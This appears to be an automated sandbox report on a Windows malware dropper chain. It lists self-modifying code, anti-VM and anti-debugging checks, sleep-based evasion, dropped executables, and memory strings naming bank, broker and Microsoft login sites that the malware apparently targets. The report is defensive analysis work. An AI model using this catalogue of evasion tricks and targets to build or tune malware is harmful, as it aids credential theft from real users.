Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Special instruction interceptor: First address: 610A6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Special instruction interceptor: First address: 61A964 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Special instruction interceptor: First address: 69BD40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Special instruction interceptor: First address: 5DEB94 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Special instruction interceptor: First address: 7848BD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Special instruction interceptor: First address: 7B4F59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Special instruction interceptor: First address: 78FEBC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Special instruction interceptor: First address: 817C94 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Special instruction interceptor: First address: 121F22B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Special instruction interceptor: First address: 1077725 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Special instruction interceptor: First address: 12257D1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Special instruction interceptor: First address: 12A9F56 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Special instruction interceptor: First address: 14A3AA0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Special instruction interceptor: First address: 166FDC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Special instruction interceptor: First address: 1658597 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Special instruction interceptor: First address: 16CF812 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Special instruction interceptor: First address: E3193E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Special instruction interceptor: First address: FD825C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Special instruction interceptor: First address: FE4A58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Special instruction interceptor: First address: 106B5AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe	Special instruction interceptor: First address: 4259F4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe	Special instruction interceptor: First address: 4234B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe	Special instruction interceptor: First address: 5F1AB6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe	Special instruction interceptor: First address: 5D2595 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1078002001\Bjkm5hE.exe	Special instruction interceptor: First address: 65BEA6 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Memory allocated: D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Memory allocated: 2910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Memory allocated: 4910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Memory allocated: 1390000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Memory allocated: 2E30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Memory allocated: 2BB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Memory allocated: 5030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Memory allocated: 5270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Memory allocated: 51B0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

Code function: 0_2_05800484 rdtsc

0_2_05800484

Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe

Thread delayed: delay time: 600000

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 532			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1615			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-8GGH0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-IITTO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-HLFAC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BKKJD.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\PqodvBZ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-MAOAB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\libGLESv2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\libEGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\icuuc51.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BKKJD.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-6VG7K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-BIN45.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-039KC.tmp	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\N53e5EuJZ3s\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\icuin51.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\Qt5PrintSupport.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-IDMIC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BKKJD.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\N53e5EuJZ3s\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\Qt5Concurrent.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\is-0DVH1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\msvcp100.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\uninstall\is-R6VPL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1078003001\PqodvBZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\msvcr100.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\uninstall\unins000.exe (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	API coverage: 7.7 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1196	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6848	Thread sleep count: 532 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6848	Thread sleep time: -1064532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5240	Thread sleep count: 292 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5240	Thread sleep time: -8760000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6980	Thread sleep count: 1615 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6980	Thread sleep time: -3231615s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe TID: 1476	Thread sleep count: 169 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe TID: 5548	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe TID: 6528	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe TID: 5060	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe TID: 6336	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 221 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 96 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 97 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 183 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 153 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 161 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe TID: 1732	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe TID: 5660	Thread sleep time: -210000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5676	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe TID: 6680	Thread sleep time: -180000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe

File opened: PHYSICALDRIVE0

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Thread delayed: delay time: 600000

Source: skotes.exe, skotes.exe, 00000006.00000002.3399131541.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, b4fe2af6b4.exe, b4fe2af6b4.exe, 00000016.00000002.2875296968.0000000000708000.00000040.00000001.01000000.00000010.sdmp, 976cb97ff6.exe, 00000018.00000002.2948104295.00000000005F4000.00000040.00000001.01000000.00000012.sdmp, cbf2b6294a.exe, 00000019.00000002.3102917411.0000000000765000.00000040.00000001.01000000.00000013.sdmp, 14b550e5e3.exe, 0000001B.00000002.3181843486.00000000011FE000.00000040.00000001.01000000.00000014.sdmp, KbSwZup.exe, 0000001C.00000002.3257888340.0000000000F39000.00000040.00000001.01000000.00000015.sdmp, 6761aae677.exe, 0000001E.00000002.3309041130.0000000001628000.00000040.00000001.01000000.00000016.sdmp, ViGgA8C.exe, 0000001F.00000002.3405062861.0000000000FBB000.00000040.00000001.01000000.00000017.sdmp, Bjkm5hE.exe, 00000026.00000002.3401794952.00000000005A8000.00000040.00000001.01000000.0000001F.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 6761aae677.exe, 0000001E.00000002.3313426041.0000000001EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__K
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: svchost.exe, 0000000C.00000002.3405372173.000002707D02B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: KbSwZup.exe, 0000001C.00000003.3148264534.0000000005A23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: KbSwZup.exe, 0000001C.00000002.3266020393.000000000130E000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3194955619.000000000130C000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3241194578.000000000130D000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3119147039.000000000130C000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3252787648.000000000130D000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3196348023.000000000130E000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3211062171.000000000130C000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3131828947.000000000130A000.00000004.00000020.00020000.00000000.sdmp, KbSwZup.exe, 0000001C.00000003.3132089180.000000000130C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW1
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: skotes.exe, 00000006.00000002.3405621850.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3405621850.0000000001209000.00000004.00000020.00020000.00000000.sdmp, xkV9ZML.exe, 0000000A.00000002.2754361510.0000000001440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3407663358.000002707D0AC000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847743530.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000002.2876054094.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000002.2876054094.0000000001739000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp, cbf2b6294a.exe, 00000019.00000003.3101213262.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: b7b5e2e140.exe, 0000000D.00000002.3095234703.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, 14b550e5e3.exe, 0000001B.00000002.3176839991.0000000000892000.00000004.00000020.00020000.00000000.sdmp, ViGgA8C.exe, 0000001F.00000002.3399497186.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0J
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: KbSwZup.exe, 0000001C.00000003.3148264534.0000000005A23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: svchost.exe, 0000000C.00000003.2739243894.000002707DE52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (lVMWare
Source: xkV9ZML.exe, 0000000A.00000002.2752619840.00000000013FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW fD
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 6761aae677.exe, 0000001E.00000002.3313426041.0000000001EE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: 4dfe6dfd76.exe, 00000013.00000002.2794194704.0000000000C63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:]D
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 976cb97ff6.exe, 00000018.00000002.2951331254.0000000005152000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: K,<=;;?9:VMcI;8
Source: 1w5RpHuliE.exe, 00000000.00000002.2099916542.00000000010BB000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2125350514.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2127455688.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3399131541.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, b4fe2af6b4.exe, 00000016.00000002.2875296968.0000000000708000.00000040.00000001.01000000.00000010.sdmp, 976cb97ff6.exe, 00000018.00000002.2948104295.00000000005F4000.00000040.00000001.01000000.00000012.sdmp, cbf2b6294a.exe, 00000019.00000002.3102917411.0000000000765000.00000040.00000001.01000000.00000013.sdmp, 14b550e5e3.exe, 0000001B.00000002.3181843486.00000000011FE000.00000040.00000001.01000000.00000014.sdmp, KbSwZup.exe, 0000001C.00000002.3257888340.0000000000F39000.00000040.00000001.01000000.00000015.sdmp, 6761aae677.exe, 0000001E.00000002.3309041130.0000000001628000.00000040.00000001.01000000.00000016.sdmp, ViGgA8C.exe, 0000001F.00000002.3405062861.0000000000FBB000.00000040.00000001.01000000.00000017.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1w5RpHuliE.exe, 00000000.00000002.2100725441.000000000190E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: KbSwZup.exe, 0000001C.00000003.3148629790.00000000059B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe

API call chain: ExitProcess graph end node

graph_23-20745

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
